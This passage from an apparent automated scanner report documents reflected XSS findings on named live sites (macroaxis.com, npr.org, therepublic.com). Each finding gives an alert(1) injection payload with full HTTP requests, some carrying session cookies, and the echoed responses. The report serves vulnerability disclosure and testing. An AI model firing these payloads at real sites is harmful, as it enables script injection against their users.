This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC&cbb11"-alert(1)-"0ecdb942be3=1 HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=6B4341DCEBE25EE8018BA77B7EEF7E70; Path=/
Content-Length: 2480
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
y_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='174px' width='100%' frameborder='0' src='http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC&cbb11"-alert(1)-"0ecdb942be3=1'>
...[SNIP]...

2.130. http://www.macroaxis.com/widgets/url.jsp [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171ae"-alert(1)-"dbac3ee73b3 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC171ae"-alert(1)-"dbac3ee73b3 HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=86336010BD34783C481AC7B25384C4BA; Path=/
Content-Length: 2477
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
ay_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='174px' width='100%' frameborder='0' src='http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC171ae"-alert(1)-"dbac3ee73b3'>
...[SNIP]...

2.131. http://www.macroaxis.com/widgets/url.jsp [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb33'%3balert(1)//711c8836387 was submitted in the t parameter. This input was echoed as 6fb33';alert(1)//711c8836387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=266fb33'%3balert(1)//711c8836387&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=5933FD8D8BF7327889B529C2C6310415; Path=/
Content-Length: 2071
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
;
document.lastChild.firstChild.appendChild(stylesheet);
}

function requestContent( local ) {

var script = document.createElement('script');
script.src = CONTENT_URL + '?t=266fb33';alert(1)//711c8836387&f=f&url=' + escape(local || location.href);
document.getElementsByTagName('head')[0].appendChild(script);
}

   this.init = function() {
    this.serverResponse = function(data) {
    if (!d
...[SNIP]...

2.132. http://www.npr.org/templates/reg/forgot-password-submit.php [public_user_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg/forgot-password-submit.php

Issue detail

The value of the public_user_email request parameter is copied into the HTML document as plain text between tags. The payload 933d3<script>alert(1)</script>6ad288fa3a4c51ff5 was submitted in the public_user_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /templates/reg/forgot-password-submit.php?public_user_email=933d3<script>alert(1)</script>6ad288fa3a4c51ff5&x=29&y=11 HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/forgot-password.php
Cache-Control: max-age=0
Origin: http://www.npr.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:40:54 GMT
Content-Type: text/html
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 12982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Forgot your p
...[SNIP]...
<strong>933d3<script>alert(1)</script>6ad288fa3a4c51ff5</strong>
...[SNIP]...

2.133. http://www.therepublic.com/assets/gzip.php [f0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f0 request parameter is copied into a JavaScript rest-of-line comment. The payload fd9b1%0aalert(1)//706f6bd3266 was submitted in the f0 parameter. This input was echoed as fd9b1
alert(1)//706f6bd3266
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.jsfd9b1%0aalert(1)//706f6bd3266&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:39 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 145899

// FILE NOT FOUND 'scripts/jquery/js/jquery-1.3.2.min.jsfd9b1
alert(1)//706f6bd3266
'

(function ($) {
$.fn.fadeTransition = function(options) {
var options = $.extend({pauseTime: 5000, transitionTime: 2000}, options);

Trans = function(obj) {
var timer = null;

...[SNIP]...

2.134. http://www.therepublic.com/assets/gzip.php [f0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f0 request parameter is copied into the HTML document as plain text between tags. The payload a75b1<img%20src%3da%20onerror%3dalert(1)>8444697b20 was submitted in the f0 parameter. This input was echoed as a75b1<img src=a onerror=alert(1)>8444697b20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.cssa75b1<img%20src%3da%20onerror%3dalert(1)>8444697b20&f1=scripts/menu/menu.css&f2=css/style.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:34 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 19325

// FILE NOT FOUND 'scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.cssa75b1<img src=a onerror=alert(1)>8444697b20'

div#menu{height:41px;background:url(http://hnemanagement.com/trassets/scripts/menu/images/main-bg.png) repeat-x;}
div#menu ul{margin:0;padding:0;list-style:none;float:left;}
div#menu ul.menu{padding
...[SNIP]...

2.135. http://www.therepublic.com/assets/gzip.php [f1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c9bb"%3balert(1)//3fa72bc3ee4 was submitted in the f1 parameter. This input was echoed as 1c9bb";alert(1)//3fa72bc3ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js1c9bb"%3balert(1)//3fa72bc3ee4&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:40 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 202184

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
"offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();// FILE NOT FOUND 'scripts/jquery/js/jquery.fadetransition.js1c9bb";alert(1)//3fa72bc3ee4'

/*
* jQuery UI 1.7.2
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquer
...[SNIP]...

2.136. http://www.therepublic.com/assets/gzip.php [f1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f1 request parameter is copied into the HTML document as plain text between tags. The payload 31990<img%20src%3da%20onerror%3dalert(1)>b9261ac9e98 was submitted in the f1 parameter. This input was echoed as 31990<img src=a onerror=alert(1)>b9261ac9e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css31990<img%20src%3da%20onerror%3dalert(1)>b9261ac9e98&f2=css/style.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:36 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 39249

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
ted a{cursor:pointer;}
.ui-tabs .ui-tabs-panel{padding:1em 1.4em;display:block;border-width:0;background:none;}
.ui-tabs .ui-tabs-hide{display:none !important;}
// FILE NOT FOUND 'scripts/menu/menu.css31990<img src=a onerror=alert(1)>b9261ac9e98'

body{margin-top:0px;margin-right:0px;margin-left:0px;font-family:Verdana, Arial, Helvetica, sans-serif;font-size:expression(screen.deviceXDPI >
...[SNIP]...

2.137. http://www.therepublic.com/assets/gzip.php [f2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f2 request parameter is copied into the HTML document as plain text between tags. The payload e3a85<img%20src%3da%20onerror%3dalert(1)>bdd1e370341 was submitted in the f2 parameter. This input was echoed as e3a85<img src=a onerror=alert(1)>bdd1e370341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css&f2=css/style.csse3a85<img%20src%3da%20onerror%3dalert(1)>bdd1e370341 HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:37 GMT
Content-Type: text/css; charset: UTF-8
Content-Length: 24933

.ui-helper-hidden{display:none;}
.ui-helper-hidden-accessible{position:absolute;left:-99999999px;}
.ui-helper-reset{margin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size
...[SNIP]...
/menu/images/lava.png) no-repeat top left !important;background-image:url(http://hnemanagement.com/trassets/scripts/menu/images/lava.gif);height:44px;margin-right:8px;}
// FILE NOT FOUND 'css/style.csse3a85<img src=a onerror=alert(1)>bdd1e370341'


2.138. http://www.therepublic.com/assets/gzip.php [f2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5be3"%3balert(1)//d085caec6b1 was submitted in the f2 parameter. This input was echoed as a5be3";alert(1)//d085caec6b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.jsa5be3"%3balert(1)//d085caec6b1&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:40 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 71404

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
seTime);
};

cue();
}

return this.each(function() {
var t = new Trans(this);
});
}
})(jQuery);

// FILE NOT FOUND 'scripts/jquery/js/jquery-ui-1.7.2.custom.min.jsa5be3";alert(1)//d085caec6b1'

/** jquery.color.js ****************/
/*
* jQuery Color Animations
* Copyright 2007 John Resig
* Released under the MIT and GPL licenses.
*/

(function(jQuery){

   // We override the animation fo
...[SNIP]...

2.139. http://www.therepublic.com/assets/gzip.php [f3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f3 request parameter is copied into a JavaScript rest-of-line comment. The payload b0ea5%0aalert(1)//a9a972eae26 was submitted in the f3 parameter. This input was echoed as b0ea5
alert(1)//a9a972eae26
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.jsb0ea5%0aalert(1)//a9a972eae26 HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:41 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 190058

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
ects.restore(e,d);if(h=="show"&&a.browser.msie){this.style.removeAttribute("filter")}if(b.callback){b.callback.apply(this,arguments)}e.dequeue()}})})}})(jQuery);;// FILE NOT FOUND 'scripts/menu/menu.jsb0ea5
alert(1)//a9a972eae26
'


2.140. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 32c0d%0aalert(1)//b26abd85278 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32c0d
alert(1)//b26abd85278
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/men/32c0d%0aalert(1)//b26abd85278u.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:42 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 190059

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
effects.restore(e,d);if(h=="show"&&a.browser.msie){this.style.removeAttribute("filter")}if(b.callback){b.callback.apply(this,arguments)}e.dequeue()}})})}})(jQuery);;// FILE NOT FOUND 'scripts/menu/men/32c0d
alert(1)//b26abd85278
u.js'


2.141. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9454e<img%20src%3da%20onerror%3dalert(1)>a76a89d3b38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9454e<img src=a onerror=alert(1)>a76a89d3b38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/css/smoothness/jquery-ui-1.7.2.custom.css&f1=scripts/menu/menu.css&f2=css/style/9454e<img%20src%3da%20onerror%3dalert(1)>a76a89d3b38.css HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
